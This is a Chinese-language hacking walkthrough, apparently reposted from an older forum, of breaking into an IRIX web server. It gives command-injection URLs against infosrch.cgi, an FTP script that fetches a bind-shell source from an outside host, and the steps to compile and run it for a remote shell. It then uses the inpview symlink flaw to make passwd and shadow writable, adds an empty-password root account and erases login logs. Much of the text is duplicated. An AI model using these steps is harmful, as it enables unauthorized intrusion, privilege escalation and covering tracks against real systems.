一次嘗試IRIX的過程(nobody shell)
發(fā)布日期:2021-12-31 20:43 | 文章來源:腳本之家
1、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|ls -la
這就是它的利用方法了。其中l(wèi)s -la是我們要運(yùn)行的命令,我不太習(xí)慣在web shell里面干活,還
是要弄出一個shell有個$來得方便些,于是就用ftp。 2、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=echo open www.xfocus.org>/tmp/a
……
……
上面這些其實就是把這一段東西輸進(jìn)/tmp/a中: open www.xfocus.org <---------別當(dāng)真,這里沒有這個東西;)
user quack quack <---------我的用戶名密碼
binary
cd /home/quack
lcd /tmp
prompt
get bindshell.c <---------這是一個綁定shell的東西,網(wǎng)上到處有
bye http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|nohup ftp -ivn
這里呢,就是在運(yùn)行ftp取回東西了;)這么拿文件的話在xferlog里不會有記錄。 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/local/bin/gcc /tmp/bindshell.c -o /tmp/abc 編譯 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/tmp/abc 運(yùn)行…… 3、現(xiàn)在我們可以telnet上去了 bash# telnet *.*.*.* 12345
Trying *.*.*.*...
Connected to *.*.*.*.
Escape character is ’^]’.
sh -i;
$Content$nbsp;id;
uid=60001(nobody) gid=60001(nobody)
$ 4、利用IRIX的inpview漏洞,該漏洞的描述如下: 某些版本IRIX下的inpview會在/var/tmp/目錄下不安全地建立臨時文件,這些臨時文
件名并不隨機(jī),用戶可以建立一個符號鏈接到其他文件,利用inpview的
setuid-to-root權(quán)限覆蓋其他文件,同時對應(yīng)文件權(quán)限被更改成0666。 漏洞利用程序就不貼了,大家自己看看,很簡單的,總之編譯完成之后。 $Content$nbsp;./a.out /etc/passwd; copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/
/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all looking for temporary file... found!
……
…… $Content$nbsp;./a.out /etc/shadow;
……
…… 就把這兩個破文件的權(quán)限都改成0666了,往下該干什么活不用我說了吧……
加個uid0的帳號,密碼為空,修改系統(tǒng),刪除sulog\weblog\wtmp\utmp里的記錄以及把/tmp下面的
東西干掉,把passwd和shadow恢復(fù)回原樣,再touch一下。走人,睡覺。 btw:一句題外話,現(xiàn)在IRIX的telnetd漏洞很猛呀,還好要有irix系統(tǒng)編譯exploit,少了些小孩做壞
事,還有,那天stardust說還有許多IRIX的lp默認(rèn)密碼為空,我看了一下,的確如此,印象中mixter
寫了一個小段子專門搜索網(wǎng)上lp空密碼帳號的……
這就是它的利用方法了。其中l(wèi)s -la是我們要運(yùn)行的命令,我不太習(xí)慣在web shell里面干活,還
是要弄出一個shell有個$來得方便些,于是就用ftp。 2、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=echo open www.xfocus.org>/tmp/a
……
……
上面這些其實就是把這一段東西輸進(jìn)/tmp/a中: open www.xfocus.org <---------別當(dāng)真,這里沒有這個東西;)
user quack quack <---------我的用戶名密碼
binary
cd /home/quack
lcd /tmp
prompt
get bindshell.c <---------這是一個綁定shell的東西,網(wǎng)上到處有
bye http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|nohup ftp -ivn
這里呢,就是在運(yùn)行ftp取回東西了;)這么拿文件的話在xferlog里不會有記錄。 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/local/bin/gcc /tmp/bindshell.c -o /tmp/abc 編譯 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/tmp/abc 運(yùn)行…… 3、現(xiàn)在我們可以telnet上去了 bash# telnet *.*.*.* 12345
Trying *.*.*.*...
Connected to *.*.*.*.
Escape character is ’^]’.
sh -i;
$Content$nbsp;id;
uid=60001(nobody) gid=60001(nobody)
$ 4、利用IRIX的inpview漏洞,該漏洞的描述如下: 某些版本IRIX下的inpview會在/var/tmp/目錄下不安全地建立臨時文件,這些臨時文
件名并不隨機(jī),用戶可以建立一個符號鏈接到其他文件,利用inpview的
setuid-to-root權(quán)限覆蓋其他文件,同時對應(yīng)文件權(quán)限被更改成0666。 漏洞利用程序就不貼了,大家自己看看,很簡單的,總之編譯完成之后。 $Content$nbsp;./a.out /etc/passwd; copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/
/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all looking for temporary file... found!
……
…… $Content$nbsp;./a.out /etc/shadow;
……
…… 就把這兩個破文件的權(quán)限都改成0666了,往下該干什么活不用我說了吧……
加個uid0的帳號,密碼為空,修改系統(tǒng),刪除sulog\weblog\wtmp\utmp里的記錄以及把/tmp下面的
東西干掉,把passwd和shadow恢復(fù)回原樣,再touch一下。走人,睡覺。 btw:一句題外話,現(xiàn)在IRIX的telnetd漏洞很猛呀,還好要有irix系統(tǒng)編譯exploit,少了些小孩做壞
事,還有,那天stardust說還有許多IRIX的lp默認(rèn)密碼為空,我看了一下,的確如此,印象中mixter
寫了一個小段子專門搜索網(wǎng)上lp空密碼帳號的……
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章